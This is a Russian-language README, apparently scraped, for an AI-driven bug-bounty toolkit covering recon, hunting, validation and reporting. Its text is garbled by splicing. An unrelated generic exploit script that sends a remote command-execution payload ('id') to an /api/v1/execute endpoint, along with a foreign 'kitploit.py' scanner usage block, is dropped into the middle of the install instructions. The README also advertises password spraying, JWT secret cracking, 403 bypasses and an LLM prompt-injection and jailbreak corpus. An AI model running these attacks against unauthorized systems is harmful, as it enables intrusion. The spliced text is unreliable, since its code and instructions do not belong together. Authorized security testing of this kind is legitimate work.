
Набор инструментов для охоты за баг-баунти на базе ИИ, работающий как с подпиской, так и без неё.
Охота за баг-баунти на базе ИИ — от разведки до отчёта, прямо в вашем терминале.
Что это такое
·
Нам доверяют
·
Бесплатная настройка
·
Быстрый старт
·
Команды
·
Что находит
·
AXguard
·
Поддержка
·
FAQ
Создано и поддерживается AwareXone · Сайт · X · GitHub
Единый шлюз к ведущим мировым ИИ-моделям
Доступ к ИИ-моделям и их эксплуатация · партнёр для автономного режима BugHunter
Зарегистрироваться по партнёрской ссылке →
· промокод AWAREXONE
· Документация
· Model Plaza
uv tool install agentic-bug-hunter # install the CLI (or: pipx install agentic-bug-hunter) bughunter setup # connect a free AI provider
Затем охотьтесь — прямо из вашего терминала:```bash
bughunter hunt target.com # recon → find → validate → report
…или запускать его изнутри Claude Code:```text /hunt target.com
<sub>CLI и AI-поиск работают самостоятельно. Полный recon также использует внешние инструменты
(subfinder · httpx · nuclei · katana · ffuf · nmap) — установите их с помощью
<code>install_tools.sh</code> из репозитория. Результаты сохраняются в <code>~/.bughunter/</code>.</sub>
---
## Нам доверяют инженеры из
<p align="center"><i>Где, по словам звёздоставителей этого проекта, они работают.</i></p>
<p align="center">
<img src="https://img.shields.io/badge/HackerOne-494649?style=for-the-badge&logo=hackerone&logoColor=white" alt="HackerOne"/>
<img src="https://img.shields.io/badge/Bugcrowd-F26822?style=for-the-badge&logo=bugcrowd&logoColor=white" alt="Bugcrowd"/>
<img src="https://img.shields.io/badge/IBM-052FAD?style=for-the-badge" alt="IBM"/>
<img src="https://img.shields.io/badge/Huawei-FF0000?style=for-the-badge&logo=huawei&logoColor=white" alt="Huawei"/>
<img src="https://img.shields.io/badge/Microsoft-0078D4?style=for-the-badge" alt="Microsoft"/>
<img src="https://img.shields.io/badge/OffSec-1A1A1A?style=for-the-badge" alt="OffSec"/>
<img src="https://img.shields.io/badge/TCS-EE3A43?style=for-the-badge&logo=tcs&logoColor=white" alt="TCS"/>
<img src="https://img.shields.io/badge/Tencent-1289FF?style=for-the-badge" alt="Tencent"/>
<img src="https://img.shields.io/badge/Apple-000000?style=for-the-badge&logo=apple&logoColor=white" alt="Apple"/>
<img src="https://img.shields.io/badge/Canonical-E95420?style=for-the-badge&logo=canonical&logoColor=white" alt="Canonical"/>
<img src="https://img.shields.io/badge/Cognizant-1662BE?style=for-the-badge" alt="Cognizant"/>
<img src="https://img.shields.io/badge/Ericsson-0082F0?style=for-the-badge&logo=ericsson&logoColor=white" alt="Ericsson"/>
<img src="https://img.shields.io/badge/Goldman_Sachs-7399C6?style=for-the-badge&logo=goldmansachs&logoColor=white" alt="Goldman Sachs"/>
<img src="https://img.shields.io/badge/Google-4285F4?style=for-the-badge&logo=google&logoColor=white" alt="Google"/>
<img src="https://img.shields.io/badge/HashiCorp-000000?style=for-the-badge&logo=hashicorp&logoColor=white" alt="HashiCorp"/>
<img src="https://img.shields.io/badge/Intel-0071C5?style=for-the-badge&logo=intel&logoColor=white" alt="Intel"/>
<img src="https://img.shields.io/badge/KPMG-00338D?style=for-the-badge" alt="KPMG"/>
<img src="https://img.shields.io/badge/Meta-0467DF?style=for-the-badge&logo=meta&logoColor=white" alt="Meta"/>
<img src="https://img.shields.io/badge/Mozilla-000000?style=for-the-badge&logo=mozilla&logoColor=white" alt="Mozilla"/>
<img src="https://img.shields.io/badge/Nvidia-76B900?style=for-the-badge&logo=nvidia&logoColor=white" alt="Nvidia"/>
<img src="https://img.shields.io/badge/PwC-D04A02?style=for-the-badge" alt="PwC"/>
<img src="https://img.shields.io/badge/Qualcomm-3253DC?style=for-the-badge&logo=qualcomm&logoColor=white" alt="Qualcomm"/>
<img src="https://img.shields.io/badge/Siemens-009999?style=for-the-badge&logo=siemens&logoColor=white" alt="Siemens"/>
<img src="https://img.shields.io/badge/Snap-FFFC00?style=for-the-badge&logo=snapchat&logoColor=black" alt="Snap"/>
<img src="https://img.shields.io/badge/SpaceX-000000?style=for-the-badge&logo=spacex&logoColor=white" alt="SpaceX"/>
<img src="https://img.shields.io/badge/Synack-2C2C2C?style=for-the-badge" alt="Synack"/>
<img src="https://img.shields.io/badge/Tsinghua-660874?style=for-the-badge" alt="Tsinghua"/>
<img src="https://img.shields.io/badge/Wipro-341C53?style=for-the-badge&logo=wipro&logoColor=white" alt="Wipro"/>
<img src="https://img.shields.io/badge/YesWeHack-24BDB4?style=for-the-badge" alt="YesWeHack"/>
<img src="https://img.shields.io/badge/Zscaler-0068B5?style=for-the-badge" alt="Zscaler"/>
</p>
<p align="center">
<sub>
Составлено по публичным профилям GitHub пользователей, поставивших звезду этому репозиторию —
43 человека из 30 организаций, подсчитано по работодателю,
указанному каждым человеком в собственном профиле, или по их публичному членству
в организациях. Имена отдельных аккаунтов не называются. Эти компании не
одобряли и не спонсировали данный проект; их логотипы показаны как товарные знаки
соответствующих владельцев.
</sub>
</p>
---
## Что это такое?
Agentic Bug Hunter находит реальные, подлежащие отчёту баги, а не теоретические. Укажите ему цель — и он выполнит recon, проверит на наличие уязвимостей, подтвердит находки через строгий фильтр и напишет готовый к отправке отчёт для HackerOne, Bugcrowd, Intigriti или Immunefi.
Он всё запоминает: паттерны, найденные на одной цели, помогают на следующей, а сессии продолжаются с того места, где остановились.
Работает как плагин для [Claude Code](https://claude.ai/claude-code) или как полностью автономный CLI (`bughunter`) без необходимости подписки.
---
## Автономный режим: подписка не требуется
**Вам больше не нужны Claude Code, Claude Pro или какая-либо платная AI-подписка.**
Установите один раз и используйте команду `bughunter` из любого терминала на вашей машине:```bash
git clone https://github.com/Awarexone/Agentic-Bug-Hunter.git
cd Agentic-Bug-Hunter
./install.sh --agent standalone
Перезапустите ту же команду после получения обновлений. Установщик обнаруживает и
обновляет активную управляемую команду bughunter, включая более старые установки
в /usr/local/bin или ~/.local/bin, сохраняя при этом вашу сохранённую конфигурацию провайдера
в ~/.bughunter/config.json.
Чтобы удалить автономную команду, сохранив её конфигурацию:```bash ./uninstall.sh --agent standalone
Используйте `--purge-config`, чтобы также удалить `~/.bughunter/config.json`. Деинсталлятор
также поддерживает цели `claude`, `opencode`, `pi`, `codex`, `agents` и `all`.```
bughunter help # show every command
bughunter setup # choose your AI provider (Ollama is free + offline)
bughunter recon target.com # map the attack surface
bughunter hunt target.com # hunt for vulnerabilities
bughunter validate "finding" # 7-Question Gate on your finding
bughunter report # write a submission-ready report
bughunter chat # interactive AI hunting shell
bughunter providers # list all available AI providers
bughunter models # list models and show the selected one
bughunter status # check which provider is active
bughunter h target.com # short alias for hunt
bughunter r target.com # short alias for recon
bughunter v "finding" # short alias for validate
BugHunter автоматически определяет провайдеров в следующем порядке: Ollama → Groq → DeepSeek → … → OrcaRouter → OpenRouter → Fluxion → Claude → OpenAI. LiteLLM включается опционально (выбирается явно или когда задан LITELLM_API_KEY), поэтому он никогда не перехватывает провайдера, который вы уже настроили. Requesty включается опционально таким же образом (выбирается явно или когда задан REQUESTY_API_KEY); задайте REQUESTY_BASE_URL=https://router.eu.requesty.ai/v1, чтобы маршрутизировать через регион EU.
Переключайте провайдеров или выбирайте установленную модель Ollama в любое время: bughunter setup.
Настройка также может быть полностью неинтерактивной:```bash
bughunter setup --provider ollama --model qwen2.5:14b
Для разового переопределения укажите опцию перед командой:```bash
bughunter --provider ollama --model qwen3:14b hunt target.com
curl -fsSL https://ollama.ai/install.sh | sh ollama pull qwen2.5:14b # ~9 GB, one-time download
git clone https://github.com/Awarexone/Agentic-Bug-Hunter.git cd Agentic-Bug-Hunter ./install.sh --agent standalone # creates system-wide 'bughunter' command
bughunter setup # choose Ollama, then choose one of its installed models bughunter recon target.com
### Настройка Groq (бесплатное облако, самый быстрый вариант)```bash
export GROQ_API_KEY="your-key-here" # free at console.groq.com
./install.sh --agent standalone
bughunter setup # choose Groq
bughunter hunt target.com
Fluxion — это опциональный шлюз, совместимый с OpenAI (https://fluxionai.world/v1). Он не является провайдером по умолчанию — выберите его в bughunter setup или задайте BRAIN_PROVIDER=fluxion, когда он вам нужен.```bash
export FLUXION_API_KEY="your-key-here" ./install.sh --agent standalone bughunter setup --provider fluxion --model openai/gpt-4o bughunter hunt target.com
bughunter --provider fluxion --model openai/gpt-4o hunt target.com
---
## Быстрый старт
**Самый быстрый способ — установка из PyPI**```bash
pip install agentic-bug-hunter
bughunter setup # pick a free AI provider
bughunter recon target.com
bughunter hunt target.com
Устанавливает команды
bughunterиbughunter-agent. AI-охота работает из коробки; полный recon также использует внешние CLI (subfinder, httpx, nuclei, katana, ffuf, nmap). Получите их с помощьюinstall_tools.shиз репозитория или вашего пакетного менеджера. Вывод записывается в~/.bughunter/(переопределяется с помощьюBUGHUNTER_HOME).
Вариант A — автономный (без подписки, работает для всех)```bash git clone https://github.com/Awarexone/Agentic-Bug-Hunter.git cd Agentic-Bug-Hunter ./install.sh --agent standalone # creates system-wide 'bughunter' command bughunter setup # pick a free AI provider bughunter recon target.com bughunter hunt target.com bughunter validate "my finding" bughunter report
**Вариант B — плагин Claude Code** *(требуется Claude Code)*```bash
git clone https://github.com/Awarexone/Agentic-Bug-Hunter.git
cd Agentic-Bug-Hunter
chmod +x install_tools.sh && ./install_tools.sh # subfinder · httpx · nuclei · katana · ffuf
chmod +x install.sh && ./install.sh # skills + commands → ~/.claude/
def __init__(self, target, port, timeout=10, verbose=False):
self.target = target
self.port = port
self.timeout = timeout
self.verbose = verbose
self.session = requests.Session()
self.session.verify = False
self.session.headers.update({
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36'
})
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
def log(self, message, level='info'):
"""Вывод логов с цветовой маркировкой"""
colors = {
'info': '\033[94m',
'success': '\033[92m',
'warning': '\033[93m',
'error': '\033[91m'
}
reset = '\033[0m'
prefix = {
'info': '[*]',
'success': '[+]',
'warning': '[!]',
'error': '[-]'
}
print(f"{colors.get(level, '')}{prefix.get(level, '[*]')} {message}{reset}")
def check_vulnerability(self):
"""Проверка уязвимости CVE-2024-XXXX"""
try:
url = f"https://{self.target}:{self.port}/api/v1/status"
response = self.session.get(url, timeout=self.timeout)
if response.status_code == 200:
data = response.json()
if 'version' in data:
version = data['version']
self.log(f"Обнаружена версия: {version}", 'info')
if self.is_vulnerable_version(version):
self.log("Цель уязвима!", 'success')
return True
else:
self.log("Цель не уязвима", 'warning')
return False
except requests.exceptions.RequestException as e:
self.log(f"Ошибка подключения: {e}", 'error')
return False
except json.JSONDecodeError:
self.log("Неверный формат JSON в ответе", 'error')
return False
def is_vulnerable_version(self, version):
"""Сравнение версий"""
vulnerable_versions = ['1.0.0', '1.0.1', '1.0.2', '1.1.0']
return version in vulnerable_versions
def exploit(self):
"""Эксплуатация уязвимости"""
if not self.check_vulnerability():
return False
try:
payload = {
'cmd': 'id',
'args': ['-a']
}
url = f"https://{self.target}:{self.port}/api/v1/execute"
response = self.session.post(
url,
json=payload,
timeout=self.timeout
)
if response.status_code == 200:
result = response.json()
self.log(f"Результат выполнения: {result}", 'success')
return True
except Exception as e:
self.log(f"Ошибка эксплуатации: {e}", 'error')
return False
def main():
parser = argparse.ArgumentParser(
description='CVE-2024-XXXX Exploit Tool'
)
parser.add_argument(
'-t', '--target',
required=True,
help='Целевой хост или IP-адрес'
)
parser.add_argument(
'-p', '--port',
type=int,
default=443,
help='Целевой порт (по умолчанию: 443)'
)
parser.add_argument(
'-v', '--verbose',
action='store_true',
help='Подробный вывод'
)
args = parser.parse_args()
exploit = Exploit(
target=args.target,
port=args.port,
verbose=args.verbose
)
if exploit.exploit():
sys.exit(0)
else:
sys.exit(1)
if __name__ == '__main__':
main()
# Базовая проверка
python3 exploit.py -t 192.168.1.100
# С указанием порта
python3 exploit.py -t example.com -p 8443
# Подробный режим
python3 exploit.py -t 10.0.0.1 -v
pip install requests urllib3
Этот инструмент предназначен только для тестирования на проникновение и образовательных целей. Используйте его только в системах, на которые у вас есть явное разрешение. Автор не несёт ответственности за любое неправомерное использование или ущерб, причинённый этим программным обеспечением.
MIT License
Security Researcher
claude
/recon target.com # map the attack surface
/hunt target.com # test for vulnerabilities
/validate # run the 7-Question Gate
/report # write the submission
```
**Вариант C — позволить Claude установить его** *(только Claude Code)*
Откройте терминал, выполните `claude`, затем вставьте:```text
Install the Claude Bug Bounty toolkit from https://github.com/Awarexone/Agentic-Bug-Hunter
into ~/tools/. Clone the repo, run ./install_tools.sh then ./install.sh.
Verify /recon /hunt /validate /report are available.
```
## MCP
Используйте Agentic-Bug-Hunter из AI-агентов (Cursor, Claude Code, Codex, OpenCode).```text
AI Agent → Agentic-Bug-Hunter MCP → Scope → Recon → Hunt → Validate → Report
```
| `--proxy` | Прокси-сервер для использования (например, `http://127.0.0.1:8080`) |
| `--timeout` | Тайм-аут запроса в секундах (по умолчанию: 10) |
| `--user-agent` | Пользовательский User-Agent (по умолчанию: случайный) |
| `--threads` | Количество параллельных потоков (по умолчанию: 10) |
| `--output` | Файл для сохранения результатов |
| `--format` | Формат вывода: `text`, `json`, `csv` (по умолчанию: `text`) |
| `--verbose` | Включить подробное логирование |
| `--quiet` | Подавить весь вывод, кроме результатов |
| `--no-color` | Отключить цветной вывод |
| `--version` | Показать версию программы и выйти |
| `--help` | Показать справочное сообщение и выйти |
### Примеры
```bash
# Базовое сканирование одного целевого URL
python3 kitploit.py -u https://example.com
# Сканирование нескольких целей из файла
python3 kitploit.py -l targets.txt
# Сканирование с использованием прокси и пользовательского тайм-аута
python3 kitploit.py -u https://example.com --proxy http://127.0.0.1:8080 --timeout 30
# Сохранение результатов в формате JSON
python3 kitploit.py -u https://example.com --format json --output results.json
# Сканирование с увеличенным количеством потоков и подробным выводом
python3 kitploit.py -l targets.txt --threads 50 --verbose
```
## Лицензия
Этот проект лицензирован в соответствии с лицензией MIT — подробности см. в файле [LICENSE](https://github.com/shuvonsec/claude-bug-bounty/blob/main/LICENSE).
## Отказ от ответственности
Данный инструмент предназначен только для образовательных целей и целей тестирования на проникновение в авторизованных средах. Использование этого инструмента против целей без предварительного взаимного согласия является незаконным. Авторы не несут ответственности за любое неправомерное использование или ущерб, причинённый этим программным обеспечением.
## Благодарности
- Вдохновлён различными инструментами разведки с открытым исходным кодом
- Спасибо всем участникам и тестировщикам
## Контакты
- Автор: Kitploit Team
- Электронная почта: [email protected]
- Веб-сайт: https://www.kitploit.com```bash
pip install 'mcp>=2.2.0'
./install.sh --agent mcp
bughunter mcp doctor
bughunter mcp serve
```
MCP — это адаптер над существующим движком исследований, а не второй сканер. Активные инструменты требуют области действия и явного одобрения. См. [docs/mcp.md](https://github.com/awarexone/Agentic-Bug-Hunter/blob/main/docs/mcp.md).
---
## Команды
### Основной рабочий процесс
| Команда | Что делает |
|:---|:---|
| `/recon target.com` | Перечисление поддоменов · проверка живых хостов · обход URL · сканирование nuclei |
| `/hunt target.com` | Тестирует IDOR · обход аутентификации · SSRF · XSS · SQLi · логические ошибки и многое другое |
| `/validate` | Шлюз из 7 вопросов — отсеивает слабые находки, прежде чем вы потратите время на отчёт |
| `/report` | Формирует заявку для H1 · Bugcrowd · Intigriti · Immunefi за 60 секунд |
| `/autopilot target.com` | Полный цикл, автономно — область → разведка → охота → валидация → отчёт |
### Разведка и перечисление
| Команда | Что делает |
|:---|:---|
| `/surface target.com` | Ранжированная поверхность атаки на основе данных разведки + памяти |
| `/scope-aggregate <program>` | Все активы в области действия по H1 · Bugcrowd · Intigriti · YWH · Immunefi |
| `/cloud-recon --keyword <name>` | Публичные S3 · Azure · GCP бакеты + origin IP для обхода CloudFlare |
| `/param-discover <url>` | Скрытые HTTP-параметры через Arjun · x8 |
| `/secrets-hunt --js-bundle <dir>` | Утечки учётных данных в исходниках, JS-бандлах или GitHub-организации |
| `/takeover --recon <dir>` | Кандидаты на захват поддоменов через dnsReaper · subjack |
| `/scan-cves <host>` | Целенаправленное сканирование nuclei high/critical + опциональный log4j-scan |
| `/bypass-403 <url>` | Трюки с заголовками · методами · кодированием против 403/401 |
| `/portscan <host>` | Открытые порты + невеб-сервисы (Redis · Docker API · БД · RDP) через naabu/smap |
| `/screenshot -l urls.txt` | Скриншоты живых хостов в HTML-галерею — триаж + доказательства PoC |
### Сканеры (Web + LLM)
| Команда | Что делает |
|:---|:---|
| `/cors <url>` | Ошибки конфигурации CORS — отражение origin · null · с учётными данными |
| `/crlf <url>` | CRLF / расщепление ответа + инъекция host-заголовка |
| `/nosqli <url>` | NoSQL-инъекция (обход оператора · тайминг `$where`) |
| `/jwt-scan <token>` | Офлайн-инструментарий JWT — alg:none · RS256→HS256 · взлом секрета |
| `/oob <target>` | Out-of-band слушатель (interactsh) для слепых SSRF/XXE/SQLi |
| `/sast <path>` | Наборы безопасности Semgrep по полученным JS/исходникам → ранжированные sinks |
| `/domxss <url>` | Подтверждает DOM XSS в headless Chromium — сообщает только когда payload выполняется |
| `/llm-redteam <endpoint>` | Корпус для red-team LLM — prompt injection · jailbreak · exfil |
### Смарт-контракты (Web3)
| Команда | Что делает |
|:---|:---|
| `/web3-audit <contract.sol>` | Аудит смарт-контракта по 10 классам с шаблоном PoC на Foundry |
| `/token-scan <contract>` | Сканер rug pull — mint authority · LP lock · honeypot · bonding curve |
### Сессии и утилиты
| Команда | Что делает |
|:---|:---|
| `/pickup target.com` | Возобновление с последней сессии — сначала непроверенные эндпоинты |
| `/intel target.com` | CVE + раскрытые отчёты, относящиеся к этой цели |
| `/chain` | Найдена ошибка A → находит ошибки B и C, которые с ней связываются |
| `/scope <asset>` | Проверяет, входит ли домен или URL в область действия, прежде чем тестировать |
| `/triage` | Быстрая 2-минутная проверка go/no-go |
| `/remember` | Записывает текущую находку или технику в память охоты |
| `/memory-gc` | Просмотр или ротация JSONL-файлов hunt-memory (лимит 10 МБ, 3 резервные копии) |
| `/arsenal [tool]` | Показывает установленные внешние инструменты или подсказку по установке |
---
## Что он находит
<details>
<summary><b>26 классов уязвимостей Web2</b></summary>
<br>
| Уязвимость | Типичная выплата |
|:---|:---|
| IDOR / BOLA | $500 – $5K |
| Обход аутентификации | $1K – $10K |
| XSS (хранимая / отражённая / DOM) | $500 – $5K |
| SSRF | $1K – $15K |
| Бизнес-логика | $500 – $10K |
| Состояния гонки | $500 – $5K |
| SQL-инъекция | $1K – $15K |
| OAuth / OIDC | $500 – $5K |
| Загрузка файлов → RCE | $500 – $10K |
| Обход аутентификации GraphQL | $1K – $10K |
| LLM / Prompt Injection | $500 – $10K |
| Ошибки конфигурации API (mass assignment · JWT · CORS) | $500 – $5K |
| Захват аккаунта | $1K – $20K |
| SSTI | $2K – $10K |
| Захват поддомена | $200 – $5K |
| Раскрытие облачных / инфраструктурных ресурсов | $500 – $20K |
| HTTP Request Smuggling | $5K – $30K |
| Отравление кэша | $1K – $10K |
| Обход MFA / 2FA | $1K – $10K |
| Атака на SAML / SSO | $2K – $20K |
| Раскрытие ошибок / отладочные эндпоинты | $200 – $5K |
| CSS-инъекция | $500 – $5K |
| LFI → RCE | $1K – $15K |
| Небезопасная десериализация | $5K – $30K |
| Dependency Confusion / цепочка поставок | $1K – $20K |
| Padding Oracle / неправильное использование криптографии | $2K – $20K |
</details>
<details>
<summary><b>10 классов ошибок Web3 / смарт-контрактов</b></summary>
<br>
| Уязвимость | Типичная выплата |
|:---|:---|
| Accounting Desync | $50K – $2M |
| Контроль доступа | $50K – $2M |
| Неполный путь выполнения кода | $50K – $2M |
| Off-By-One | $10K – $100K |
| Манипуляция оракулом | $100K – $2M |
| Инфляция долей ERC4626 | $50K – $500K |
| Reentrancy | $10K – $500K |
| Атака с флеш-кредитом | $100K – $2M |
| Повторное использование подписи | $10K – $200K |
| Прокси / обновление | $50K – $2M |
</details>
---
## AI-агенты
Девять специалистов, каждый создан для одной задачи:
| Агент | Роль |
|:---|:---|
| `recon-agent` | Перечисление поддоменов · обнаружение живых хостов · обход URL |
| `report-writer` | Отчёты с акцентом на влияние, которые оплачивают, а не отклоняют как N/A |
| `validator` | Запускает шлюз из 7 вопросов — отсеивает слабые находки |
| `web3-auditor` | Аудит смарт-контрактов по 10 классам ошибок |
| `chain-builder` | Ошибка A → находит ошибки B и C, которые с ней связываются |
| `autopilot` | Полный цикл охоты с контрольными точками безопасности |
| `recon-ranker` | Ранжирует поверхность атаки, начиная с наиболее ценных целей |
| `token-auditor` | Сканирование мемкоинов / токенов на rug pull и безопасность |
| `credential-hunter` | Генерация словаря → OSINT → проверка утечек → распыление (жёсткая остановка перед распылением) |
---
## Как это работает
<div align="center">```
You ─▶ /recon ─▶ /hunt ─▶ /validate ─▶ /report
│ │
▼ ▼
Hunt Memory 7-Question Gate
(persists across (kills weak findings
sessions) before you submit)
```
</div>
Каждый инструмент в конвейере проверяется на наличие установки — отсутствующие инструменты пропускаются, а не вызывают ошибки. Заголовки авторизации, заданные один раз, автоматически передаются через httpx · katana · ffuf · nuclei · dalfox.
---
## Структура проекта
<details>
<summary><b>Нажмите, чтобы развернуть полное дерево</b></summary>
<br>```
Agentic-Bug-Hunter/
│
├── skills/ # AI knowledge bases - loaded as /skill-name
│ ├── bug-bounty/ # Master workflow - all vuln classes, LLM testing, chains
│ ├── bb-methodology/ # Hunting mindset · 5-phase workflow · session discipline
│ ├── web2-recon/ # Subdomain enum · live host discovery · URL crawl
│ ├── web2-vuln-classes/ # 26 bug classes with bypass tables
│ ├── security-arsenal/ # Payloads · bypass tables · gf patterns
│ ├── triage-validation/ # 7-Question Gate · 4 gates · never-submit list
│ ├── report-writing/ # Templates for H1 · Bugcrowd · Intigriti · Immunefi
│ ├── web3-audit/ # Smart contract bugs · Foundry PoC · 10 bug classes
│ ├── meme-coin-audit/ # Rug pull detection · LP attacks · bonding curve
│ ├── credential-attack/ # Password spray methodology · legal guardrails
│ └── client-reverse/ # Request-signing / anti-bot token reversal
│
├── commands/ # 33 slash commands (/recon /hunt /validate /report …)
├── agents/ # 9 specialized AI agents (recon, validator, reporter …)
│
├── tools/ # Python + shell scanner pipeline (~35 tools)
│ ├── hunt.py # Master orchestrator
│ ├── recon_engine.sh # Subdomain + URL discovery
│ ├── vuln_scanner.sh # XSS · SQLi · SSRF · SSTI probe pipeline
│ ├── validate.py # 4-gate finding validator with identity checks
│ └── … # 30+ more scanners - see tools/README.md
│
├── memory/ # Cross-session hunt memory (pattern DB · audit log)
├── rules/ # Always-active hunting + reporting rules
├── tests/ # Regression test suite (pytest)
├── web3/ # 13-chapter smart contract audit guide
├── mcp/ # MCP — native BugHunter server + Burp · Caido · HackerOne
├── wordlists/ # Curated wordlists + SecLists / PayloadsAllTheThings refs
├── scripts/ # Dork runner · full hunt pipeline
├── hooks/ # Claude Code hook configuration
├── site/ # bughunter.fun landing page
├── demo/ # Local vulnerable target for tutorial recordings
│
├── docs/ # Extended documentation
│ ├── advanced-techniques.md # Exploitation techniques + chaining strategies
│ ├── auth-sessions.md # Auth header management guide
│ ├── payloads.md # Payload reference for common vuln classes
│ ├── smart-contract-audit.md# Smart contract audit deep-dive
│ ├── TUTORIAL.md # A→Z video tutorial walkthrough
│ └── TODOS.md # Open improvement items
│
├── .github/ # GitHub community health files
│ ├── CONTRIBUTING.md # How to contribute
│ ├── CODE_OF_CONDUCT.md # Community standards
│ ├── SECURITY.md # Vulnerability reporting policy
│ ├── PULL_REQUEST_TEMPLATE.md
│ └── ISSUE_TEMPLATE/ # Bug report · Feature request · False positive
│
├── engine.py # Standalone CLI - 'bughunter' command, no subscription needed
├── brain.py # Multi-provider LLM layer (Ollama · Groq · DeepSeek · Claude · OpenAI)
├── agent.py # LangGraph-style ReAct hunting agent
├── install.sh # Install skills + commands → ~/.claude/ (or standalone mode)
├── install_tools.sh # Install subfinder · httpx · nuclei · katana · ffuf …
├── uninstall.sh # Remove skills + commands from ~/.claude/
├── uninstall_tools.sh # Remove external scanning tools
├── serve.py # Launch local demo target (python3 serve.py)
├── config.example.json # Auth session config template
├── requirements.txt # Python dependencies
├── CLAUDE.md # Claude Code plugin manifest (auto-loaded)
├── AGENTS.md # Multi-harness plugin guide (OpenCode · Codex · Pi)
├── SKILL.md # Master skill shortcut (auto-loaded by agent harnesses)
├── OPENCODE.md # OpenCode-specific installation guide
├── CHANGELOG.md # Version history
├── FAQ.md # Frequently asked questions
└── TERMS.md # Terms of use + authorized testing only
```
</details>
---
## Установка
**Предварительные требования:**```bash
# macOS
brew install go python3 jq
# Linux (Ubuntu/Debian)
sudo apt install golang python3 jq
```
**Инструменты сканирования** (устанавливает subfinder · httpx · nuclei · katana · ffuf · gau · dnsx · nmap · dalfox и другие):```bash
chmod +x install_tools.sh && ./install_tools.sh
```
**Автономная команда `bughunter`** (без подписки, работает без Claude Code):```bash
./install.sh --agent standalone
bughunter setup # choose Ollama (free) · Groq (free tier) · DeepSeek (cheap) · Claude · OpenAI
```
**Навыки и команды ИИ** в Claude Code:```bash
chmod +x install.sh && ./install.sh
```
**Другие обвязки агентов:**```bash
./install.sh --agent opencode # OpenCode
./install.sh --agent pi # Pi Agent
./install.sh --agent codex # Codex
./install.sh --agent all # every supported target
```
**Опционально: ключ Chaos API** (лучшее покрытие поддоменов)```bash
export CHAOS_API_KEY="your-key"
echo 'export CHAOS_API_KEY="your-key"' >> ~/.zshrc
```
---
## Правила
Семь правил работают в каждой сессии, без исключений:
| # | Правило | Почему |
|:-:|:---|:---|
| 1 | **Сначала прочитай полный scope** | Тестируй только то, что разрешено программой |
| 2 | **Только реальные баги** | «Может ли атакующий сделать это ПРЯМО СЕЙЧАС?» — если нет, остановись |
| 3 | **Отсекай слабые находки** | 30-секундная проверка экономит часы бесполезного отчёта |
| 4 | **Никогда не выходи за scope** | Один неверный запрос может привести к бану |
| 5 | **Правило 5 минут** | Нет прогресса через 5 минут? Двигайся дальше |
| 6 | **Валидируй перед отчётом** | `/validate` перед тем, как потратить 30 минут на написание |
| 7 | **Сначала impact** | Сначала тестируй баги с самыми тяжёлыми последствиями |
---
## Участие в разработке
PR приветствуются. Наиболее ценно:
- Новые модули сканера или техники обнаружения
- Дополнения payload в `skills/security-arsenal/SKILL.md`
- Улучшения методологии, подкреплённые платными отчётами
- Поддержка платформ (YesWeHack · Synack · HackenProof)```bash
git checkout -b feature/your-contribution
git commit -m "feat: short description"
git push origin feature/your-contribution
```
---
## Кто использует
<p align="center"><i>Команды и исследователи, использующие BugHunter в своей работе.</i></p>
<table align="center">
<tr>
<td align="center" width="200">
<a href="https://awarexone.com">
<img src="https://raw.githubusercontent.com/awarexone/Agentic-Bug-Hunter/main/assets/awarexone-logo.webp" alt="AwareXone" width="72"/>
<br/><b>AwareXone</b>
</a>
<br/><sub>AI-агент против мошенничества и скама</sub>
</td>
<td align="center" width="200">
<a href="https://github.com/shuvonsec/claude-bug-bounty/blob/main/ADOPTERS.md">
<img src="https://img.shields.io/badge/+-Add_your_team-7F55FF?style=for-the-badge" alt="Add your team"/>
</a>
<br/><sub>Откройте PR в одну строку</sub>
</td>
</tr>
</table>
<p align="center">
Используете BugHunter в своей команде, программе или рабочем процессе? <b><a href="https://github.com/shuvonsec/claude-bug-bounty/blob/main/ADOPTERS.md">Добавьте себя</a></b> — быстрый PR в <code>ADOPTERS.md</code> или откройте <a href="https://github.com/Awarexone/Agentic-Bug-Hunter/issues">issue</a>. Только реальные, проверяемые записи.
</p>
---
## Поддержать проект
Если BugHunter помогает вашим охотам, вы можете поддержать их — каждый вклад помогает создавать больше open-source инструментов безопасности.
### Криптовалютные пожертвования
| | Адрес |
|:---|:---|
| **Bitcoin (BTC)** | `1GXwGqmLcnbZWgVNskUAZyw2cmqenkUFNY` |
| **Solana (SOL)** | `4ArkPu1E7tkrt3d5X84grWzF1xjuLpScgGEy12Bp2cmE` |
<p align="center">
<a href="https://www.buymeacoffee.com/shuvonsec">
<img src="https://assets.kitploit.com/production/public/readmes/65/322a7c99f1dd15a03b3c1b00b0d18ddd87443d80b823d3467a240721ae02357e/37540ef5b455c7e9fd2e680a883fa3eaa5ac7dfe7ea38853db90363dee628a84-display-v1.webp" alt="Buy Me A Coffee" height="50"/>
</a>
</p>
### Спонсорство
<p align="center">
<a href="https://github.com/sponsors/awarexone">
<img src="https://img.shields.io/badge/Sponsor_AwareXone-ea4aaa?style=for-the-badge&logo=github&logoColor=white" alt="Sponsor awarexone on GitHub"/>
</a>
</p>
Мы открыты для спонсоров. Спонсорство финансирует новые функции и сохраняет standalone-режим бесплатным для всех, а также размещает ваш логотип и ссылку прямо здесь в README, плюс упоминание в каждом релизе.
Хотите стать спонсором? Используйте [GitHub Sponsors](https://github.com/sponsors/awarexone) или свяжитесь с нами через [AwareXone.com](https://awarexone.com) / [[email protected]](mailto:[email protected]).
Партнёр по доступу к AI-моделям: **[Fluxion AI](https://fluxionai.world/register?source=github&campaign=github-awarexone&promo=AWAREXONE)** — [документация](https://docs.fluxionai.world/user-guide/help-center) · [Model Plaza](https://fluxionai.world/model-plaza).
### AwareXone
BugHunter создан и поддерживается [AwareXone](https://awarexone.com). Помимо open-source инструментов, таких как этот, AwareXone разрабатывает AI-защиту от мошенничества, скама и социальной инженерии, а также предлагает консалтинг по защите от социальной инженерии и управлению человеческими рисками для организаций. Если вашей команде это нужно — [свяжитесь с нами](https://awarexone.com).
---
## Больше от AwareXone
Создаёте приложения с помощью AI? Дополните BugHunter инструментом **[AXguard](https://github.com/Awarexone/AXguard)** — сканируйте и исправляйте типичные проблемы безопасности в приложениях, написанных с помощью AI, до релиза.
<p align="center">
<a href="https://github.com/Awarexone/AXguard">
<img src="https://raw.githubusercontent.com/Awarexone/AXguard/main/assets/cover.jpg" alt="AXguard by AwareXone" width="720"/>
</a>
</p>
<p align="center">
<a href="https://github.com/Awarexone/AXguard"><b>Посмотреть AXguard на GitHub →</b></a>
·
<a href="mailto:[email protected]">[email protected]</a>
